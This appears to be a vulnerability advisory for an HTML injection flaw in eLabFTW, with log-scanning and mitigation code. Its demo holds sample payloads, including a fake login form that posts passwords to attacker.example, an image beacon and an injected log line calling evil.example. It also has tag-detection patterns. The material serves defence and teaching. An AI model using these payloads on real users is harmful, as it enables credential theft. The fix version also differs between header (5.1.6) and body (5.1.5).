Platform
php
Component
elabftw
Fixed in
5.1.6
CVE-2024-47826 describes a Cross-Site Scripting (XSS) vulnerability, more precisely an HTML injection, affecting eLabFTW versions prior to 5.1.5. The flaw lets an attacker inject arbitrary HTML tags into specific pages of the application, which can lead to defacement or to disclosure of information a user is tricked into entering. The affected pages are "experiments.php" (show mode), "database.php" (show mode) and "search.php". A fix is available in version 5.1.5.
An attacker exploits the flaw by placing HTML markup in the extended search string submitted to one of the affected pages. When a user views the resulting page, the browser renders the injected markup as if it were part of eLabFTW's own content. According to the advisory, arbitrary JavaScript execution is not possible because of the security measures in place, but plain HTML is enough for several attacks: displaying misleading content, planting links to phishing sites, or injecting a fake login form that submits whatever the victim types to an attacker-controlled host. The blast radius is limited to users who view an affected page with the injected search string, but the impact can be significant depending on the attacker's goals.
CVE-2024-47826 was publicly disclosed on 2024-10-14. There is no indication of active exploitation or of inclusion in the CISA KEV catalog at the time of writing. Public proof-of-concept (PoC) code is not widely available, but the vulnerability needs no special tooling and is easy to exploit for anyone who can reach the affected pages.
Research labs and organizations that use eLabFTW as their electronic lab notebook are at risk; specifically, deployments running versions prior to 5.1.5 are vulnerable. Multi-user instances, including shared-hosting setups where several teams use the same eLabFTW installation, are at increased risk, because any account, including a compromised low-privileged one, can supply a search string that other users of the instance will see rendered.
• php: Examine access logs for requests to experiments.php, database.php or search.php whose search query parameters contain HTML tags, either raw or percent-encoded (Apache logs the request line as the client sent it, so a payload usually appears as %3C rather than as a literal "<"). The original command used "|" without -E, which grep treats literally in basic regular expressions; the corrected pipeline below matches the three pages first and then tag-like sequences in both encodings:
grep -Ei '(experiments|database|search)\.php' /var/log/apache2/access.log | grep -Ei '<[a-z/]|%3c[a-z/%]|script|onerror'
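The grep above is a quick triage; it cannot percent-decode, so a double-encoded payload (%253C) slips past it and a harmless comparison such as "temperature < 5" trips it. The following scanner, an added example that is not code from the eLabFTW project or from this page's author, parses Apache combined-format lines, isolates requests to the three pages named in the advisory, decodes each query parameter repeatedly and flags only values that contain a tag opener. The log lines are constructed for the demo, and the parameter name "q" in them is an assumption, since the advisory does not name the parameter that carries the extended search string.

```python
"""Scan Apache access-log lines for HTML-injection attempts against the
eLabFTW pages named in the CVE-2024-47826 advisory.

Added example, not eLabFTW project code. The sample log lines below are
constructed; the page names come from the advisory, the parameter name
"q" is an assumption."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

TARGET_PAGES = ("experiments.php", "database.php", "search.php")

# Apache "combined" format: client ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A tag opener as a browser sees it: "<" then an optional "/" and a letter.
# "< 5" (a comparison) does not match, "<form" and "</a" do.
TAG_RE = re.compile(r"<\s*/?[a-zA-Z]")


def decode_param(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so %253C (double-encoded "<") is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target: str) -> list:
    """Return (name, decoded value) for every query parameter of a request to
    one of the affected pages that contains a tag opener after decoding."""
    parts = urlsplit(target)
    page = parts.path.rsplit("/", 1)[-1]
    if page not in TARGET_PAGES:
        return []
    hits = []
    # parse_qsl already decodes one layer and turns "+" into a space.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = decode_param(value)
        if TAG_RE.search(decoded):
            hits.append((name, decoded))
    return hits


def scan(lines) -> list:
    """Run suspicious_params over parsed log lines and collect the findings."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        hits = suspicious_params(m["target"])
        if hits:
            findings.append({"ip": m["ip"], "user": m["user"], "time": m["time"],
                             "target": m["target"], "params": hits})
    return findings


# Constructed sample log: one benign search, a single-encoded form injection,
# a double-encoded meta tag, a benign "<" comparison, and a tag on a page
# that is not in scope for this CVE.
SAMPLE_LOG = [
    '10.0.0.5 - alice [14/Oct/2024:10:01:02 +0000] "GET /search.php?q=PCR+protocol HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.9 - bob [14/Oct/2024:10:02:17 +0000] "GET /search.php?q=%3Cform+action%3Dhttps%3A%2F%2Fevil.example%2Flogin%3E HTTP/1.1" 200 6001 "-" "Mozilla/5.0"',
    '10.0.0.9 - bob [14/Oct/2024:10:03:44 +0000] "GET /experiments.php?mode=show&id=42&q=%253Cmeta%2520http-equiv%253Drefresh%253E HTTP/1.1" 200 7023 "-" "Mozilla/5.0"',
    '10.0.0.7 - carol [14/Oct/2024:10:04:01 +0000] "GET /database.php?mode=show&id=7&q=temperature+%3C+5 HTTP/1.1" 200 4400 "-" "Mozilla/5.0"',
    '10.0.0.7 - carol [14/Oct/2024:10:05:01 +0000] "GET /profile.php?q=%3Cb%3Ehi%3C%2Fb%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} user={f['user']} {f['target']} -> {f['params']}")
```

Run against a real log with `scan(open("/var/log/apache2/access.log"))`. Only the two requests by "bob" are reported; the comparison in carol's query and the tag on profile.php are left alone, which keeps the alert rate manageable on a busy instance.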
Disclosure
Exploit status
EPSS
0.38% (59th percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2024-47826 is to upgrade eLabFTW to version 5.1.5 or later, which contains the fix. If upgrading is not immediately feasible, two stopgaps reduce exposure: reject or HTML-encode the extended search string on the server before it is rendered, and add a Web Application Firewall (WAF) rule that blocks requests to the three affected pages whose search parameters contain tag-like sequences, raw or percent-encoded. Both are interim measures; the durable fix for this bug class is output encoding at the point where the search string is written into the page, and the upgrade should still be applied.
Update eLabFTW to version 5.1.5 or later. This version contains a fix for the HTML injection vulnerability. The update can be carried out through the usual software update channels.
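To make the two points above concrete, the exploit mechanics (injected markup is rendered as page content even though no script runs) and the interim mitigation (input-side rejection versus output encoding), here is an added example that is not eLabFTW code and not from this page's author. The page template, the assumption that the search string is reflected into a results heading, and the two payloads are constructed for the demo; a CSP that blocks inline script is assumed, as the advisory states that arbitrary JavaScript does not execute.

```python
"""Reflected HTML injection of a search string: the vulnerable rendering
next to the output-encoded fix, an input-side stopgap, and a checker that
lists the elements an injected string adds to the page.

Added example, not eLabFTW code. Template, parameter handling and payloads
are assumptions constructed for this demo."""
import html
import re
from html.parser import HTMLParser

# Elements the legitimate template emits; anything else came from the input.
TEMPLATE_TAGS = frozenset({"main", "h2", "ul", "li"})

# Tag opener as a browser sees it ("<form", "</a", "<!--"); "< 5" is text.
TAG_LIKE = re.compile(r"<\s*/?[a-zA-Z!?]")


def render_vulnerable(query: str) -> str:
    """Reflects the search string into the page body unchanged."""
    return (f"<main><h2>Results for: {query}</h2>"
            "<ul><li>No matching entries</li></ul></main>")


def render_fixed(query: str) -> str:
    """Same template, but the untrusted string is HTML-encoded where it meets
    markup. quote=True also encodes quotes, so the result is safe inside
    attribute values as well as in text content."""
    return (f"<main><h2>Results for: {html.escape(query, quote=True)}</h2>"
            "<ul><li>No matching entries</li></ul></main>")


def contains_markup(query: str) -> bool:
    """Input-side stopgap (what a WAF rule or a small interim patch checks):
    True when the search string carries a tag opener. Coarser than output
    encoding, but it blocks the known payload shape without touching the
    templates."""
    return TAG_LIKE.search(query) is not None


class _TagCollector(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def injected_elements(rendered: str) -> list:
    """Parse the rendered page the way a browser would and return the
    (tag, attributes) pairs that are not part of the template."""
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    return [(t, a) for t, a in parser.tags if t not in TEMPLATE_TAGS]


# Constructed payloads. Neither needs JavaScript: the form posts whatever the
# victim types to the attacker's host, the image request reports each page
# view. CSP form-action and img-src directives can restrict them, but that is
# a separate control from the injection itself.
FORM_PHISH = ('<form action="https://attacker.example/collect" method="post">'
              "<p>Your session has expired, please sign in again.</p>"
              '<input name="password" type="password"><button>Sign in</button></form>')
IMG_BEACON = '<img src="https://attacker.example/seen.gif" alt="">'
BENIGN_QUERY = "temperature < 5 & pH > 7"   # legitimate use of "<" in a search


def demo() -> dict:
    """Tag names each payload adds to the vulnerable and the fixed page."""
    results = {}
    for name, payload in (("form", FORM_PHISH), ("img", IMG_BEACON), ("benign", BENIGN_QUERY)):
        results[name] = {
            "vulnerable": [t for t, _ in injected_elements(render_vulnerable(payload))],
            "fixed": [t for t, _ in injected_elements(render_fixed(payload))],
            "rejected_by_stopgap": contains_markup(payload),
        }
    return results


if __name__ == "__main__":
    for name, r in demo().items():
        print(f"{name:7s} vulnerable={r['vulnerable']} fixed={r['fixed']} "
              f"stopgap_rejects={r['rejected_by_stopgap']}")
```

The checker is deliberately a parser rather than a substring search: it shows that the vulnerable page really contains a second form with its own action attribute, while in the fixed page the same bytes survive only as text. The stopgap lets the benign comparison through and rejects both payloads, which is the behaviour a WAF rule for the three pages should reproduce.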
CVE-2024-47826 is a Cross-Site Scripting (XSS) vulnerability, an HTML injection, in eLabFTW versions prior to 5.1.5 that allows attackers to inject HTML into specific pages.
You are affected if you run an eLabFTW version prior to 5.1.5. Upgrade to 5.1.5 or later to resolve the vulnerability.
Upgrade eLabFTW to version 5.1.5 or later. Consider input validation and WAF rules as temporary mitigations.
There is currently no evidence of active exploitation, but the vulnerability is relatively easy to exploit.
Refer to the eLabFTW project's official website or security advisories for the latest information.